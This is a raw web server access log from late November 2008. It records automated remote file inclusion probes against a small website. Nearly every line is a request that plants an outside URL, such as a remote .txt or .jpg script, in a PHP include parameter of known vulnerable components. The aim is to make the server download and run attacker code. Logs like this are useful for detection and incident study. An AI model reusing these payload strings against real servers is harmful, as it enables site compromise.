70.85.198.234 - - [30/Nov/2008:17:14:10 -0800] "GET /logs/access_080526.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:14:10 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:14:10 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:14:21 -0800] "GET /logs/index.php?redir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:14:21 -0800] "GET /index.php?redir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:14:24 -0800] "GET /logs/access_080811.log/index.php?redir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
121.125.79.167 - - [30/Nov/2008:17:14:49 -0800] "GET /logs/access.log/index.php?redir=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
189.19.18.231 - - [30/Nov/2008:17:16:07 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "summitcircle.com"
189.19.18.231 - - [30/Nov/2008:17:16:07 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "summitcircle.com"
202.123.69.25 - - [30/Nov/2008:17:16:40 -0800] "GET /logs/access_080427.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:16:57 -0800] "GET /logs/access_080811.log%20%20/index.php?redir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:16:57 -0800] "GET /logs/access.log%20%20/index.php?redir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
202.123.69.25 - - [30/Nov/2008:17:17:01 -0800] "GET /logs/access_080427.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.49.188.178 - - [30/Nov/2008:17:17:11 -0800] "GET /logs/access_080427.log/index.php?redir=http://forum.happybass.com/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
200.49.188.178 - - [30/Nov/2008:17:17:11 -0800] "GET /logs/index.php?redir=http://forum.happybass.com/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
200.49.188.178 - - [30/Nov/2008:17:17:11 -0800] "GET /index.php?redir=http://forum.happybass.com/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:17:33 -0800] "GET /logs/access_080629.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:17:33 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:17:33 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:17:58 -0800] "GET /logs/access_080629.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:17:58 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:17:58 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
189.19.18.231 - - [30/Nov/2008:17:18:30 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "summitcircle.com"
87.94.1.95 - - [30/Nov/2008:17:18:31 -0800] "GET /errors.php?error=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:18:38 -0800] "GET /logs/access_080526.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:18:38 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:18:38 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
189.19.18.231 - - [30/Nov/2008:17:18:41 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "summitcircle.com"
189.19.18.231 - - [30/Nov/2008:17:18:41 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:18:53 -0800] "GET /logs/access_080526.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.22.82.133 - - [30/Nov/2008:17:19:07 -0800] "GET /logs/access_080602.log/?index.php?sourcedir=http://2excel.com.au/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.22.82.133 - - [30/Nov/2008:17:19:07 -0800] "GET /?index.php?sourcedir=http://2excel.com.au/id3.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.22.82.133 - - [30/Nov/2008:17:19:07 -0800] "GET /logs/?index.php?sourcedir=http://2excel.com.au/id3.txt???? HTTP/1.1" 200 5228 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.22.82.133 - - [30/Nov/2008:17:19:19 -0800] "GET /logs/access_080602.log/?index.php?sourcedir=http://2excel.com.au/id3.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.22.82.133 - - [30/Nov/2008:17:19:19 -0800] "GET /?index.php?sourcedir=http://2excel.com.au/id3.txt???? HTTP/1.1" 200 779 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:20:09 -0800] "GET /addpost_newpoll.php?addpoll=preview&thispath=http://www.irontonforge.com/McN/readme.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:20:09 -0800] "GET /logs/access_080602.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.irontonforge.com/McN/readme.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:20:09 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.irontonforge.com/McN/readme.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
200.49.188.178 - - [30/Nov/2008:17:20:16 -0800] "GET /logs/access.log/index.php?redir=http://forum.happybass.com/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
213.219.244.85 - - [30/Nov/2008:17:20:27 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://youngcarers.org.uk/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
213.219.244.85 - - [30/Nov/2008:17:20:27 -0800] "GET /logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://youngcarers.org.uk/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
213.219.244.85 - - [30/Nov/2008:17:20:27 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://youngcarers.org.uk/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
77.221.130.16 - - [30/Nov/2008:17:20:30 -0800] "GET /logs/access_080427.log/index.php?redir=http://forum.happybass.com/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
85.214.122.25 - - [30/Nov/2008:17:20:42 -0800] "GET /logs/access_080811.log/index.php?redir=http://forum.happybass.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
85.214.122.25 - - [30/Nov/2008:17:20:42 -0800] "GET /logs/index.php?redir=http://forum.happybass.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.94.1.95 - - [30/Nov/2008:17:21:05 -0800] "GET /errors.php?error=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
216.98.128.36 - - [30/Nov/2008:17:21:11 -0800] "GET /logs/access_080629.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.98.128.36 - - [30/Nov/2008:17:21:11 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.98.128.36 - - [30/Nov/2008:17:21:11 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
66.147.240.95 - - [30/Nov/2008:17:21:22 -0800] "GET /logs/index.php?redir=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
66.147.240.95 - - [30/Nov/2008:17:21:22 -0800] "GET /logs/access_080811.log/index.php?redir=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
66.147.240.95 - - [30/Nov/2008:17:21:22 -0800] "GET /index.php?redir=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
85.214.122.25 - - [30/Nov/2008:17:22:25 -0800] "GET /logs/access_080811.log%20%20/index.php?redir=http://forum.happybass.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
66.147.240.95 - - [30/Nov/2008:17:22:27 -0800] "GET /logs/access_080811.log%20%20/index.php?redir=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
85.214.122.25 - - [30/Nov/2008:17:22:30 -0800] "GET /logs/access.log%20%20/index.php?redir=http://forum.happybass.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
66.147.240.95 - - [30/Nov/2008:17:22:31 -0800] "GET /logs/access.log%20%20/index.php?redir=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.98.128.36 - - [30/Nov/2008:17:22:36 -0800] "GET /logs/access_080526.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:22:55 -0800] "GET /logs/access_080609.log//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:22:55 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:22:55 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:23:21 -0800] "GET /logs/access_080427.log//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
189.19.18.231 - - [30/Nov/2008:17:23:27 -0800] "GET /logs/access_080804.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
189.19.18.231 - - [30/Nov/2008:17:23:27 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
189.19.18.231 - - [30/Nov/2008:17:23:27 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
77.221.130.16 - - [30/Nov/2008:17:23:36 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
77.221.130.16 - - [30/Nov/2008:17:23:36 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:24:10 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:24:41 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:24:41 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.20.138.16 - - [30/Nov/2008:17:25:04 -0800] "GET /index.php?redir=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.20.138.16 - - [30/Nov/2008:17:25:04 -0800] "GET /logs/access_080811.log/index.php?redir=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.20.138.16 - - [30/Nov/2008:17:25:04 -0800] "GET /logs/index.php?redir=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:25:31 -0800] "GET /logs/access_080609.log//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:25:38 -0800] "GET /logs/access.log//index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:25:38 -0800] "GET /logs//index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:25:38 -0800] "GET /index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:25:42 -0800] "GET /logs/access_080811.log//index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
217.20.138.16 - - [30/Nov/2008:17:25:48 -0800] "GET /logs/access.log/index.php?redir=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.219.244.85 - - [30/Nov/2008:17:25:52 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://youngcarers.org.uk/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
200.101.192.223 - - [30/Nov/2008:17:25:53 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
200.101.192.223 - - [30/Nov/2008:17:25:54 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:25:59 -0800] "GET /logs/access_080427.log//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.54.63.130 - - [30/Nov/2008:17:26:44 -0800] "GET /home.php?pagina=http://www.leegolf.com/vboard/data/idz.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:27:11 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:27:11 -0800] "GET /logs/access_080505.log%20//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:27:11 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:27:17 -0800] "GET /index.php?redir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:27:17 -0800] "GET /logs//index.php?redir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:27:17 -0800] "GET /logs/access.log%20%20//index.php?redir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:27:25 -0800] "GET /logs/access_080811.log%20%20//index.php?redir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.22.82.133 - - [30/Nov/2008:17:27:34 -0800] "GET /logs/access_080526.log/?index.php?sourcedir=http://2excel.com.au/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.214.122.25 - - [30/Nov/2008:17:27:36 -0800] "GET /logs/access.log/index.php?redir=http://forum.happybass.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
85.214.122.25 - - [30/Nov/2008:17:27:42 -0800] "GET /logs/access_080427.log/index.php?redir=http://forum.happybass.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
66.147.240.95 - - [30/Nov/2008:17:28:00 -0800] "GET /logs/access.log/index.php?redir=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
66.147.240.95 - - [30/Nov/2008:17:28:00 -0800] "GET /logs/access_080427.log/index.php?redir=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.22.82.133 - - [30/Nov/2008:17:28:16 -0800] "GET /?index.php?sourcedir=http://2excel.com.au/id3.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "summitcircle.com"
64.22.82.133 - - [30/Nov/2008:17:28:18 -0800] "GET /?index.php?sourcedir=http://2excel.com.au/id3.txt???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:28:48 -0800] "GET /logs/access_080512.log/main.php?id=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:28:48 -0800] "GET /main.php?id=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:28:48 -0800] "GET /logs/main.php?id=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:29:27 -0800] "GET /logs/access_080512.log/main.php?id=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:29:27 -0800] "GET /main.php?id=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:29:27 -0800] "GET /logs/main.php?id=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.147.240.95 - - [30/Nov/2008:17:30:36 -0800] "GET /logs/access_080616.log/index.php?redir=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
207.44.134.23 - - [30/Nov/2008:17:31:03 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.moneytec.com/trader/request/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.summitcircle.com"
207.44.134.23 - - [30/Nov/2008:17:31:03 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.moneytec.com/trader/request/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.summitcircle.com"
217.20.138.16 - - [30/Nov/2008:17:31:08 -0800] "GET /index.php?redir=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:31:48 -0800] "GET /logs/access_080427.log//index.php?redir=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
161.195.66.150 - - [30/Nov/2008:17:32:01 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.summitcircle.com"
201.3.132.147 - - [30/Nov/2008:17:33:02 -0800] "GET /errors.php?error=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.3.132.147 - - [30/Nov/2008:17:33:02 -0800] "GET /logs/errors.php?error=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:33:23 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:33:23 -0800] "GET /logs/access_080512.log/lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:33:23 -0800] "GET /lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:33:50 -0800] "GET /logs/access.log/index.php?redir=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:34:05 -0800] "GET /logs/access_080629.log/lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:34:27 -0800] "GET /lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:34:27 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:17:34:27 -0800] "GET /logs/access_080512.log/lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
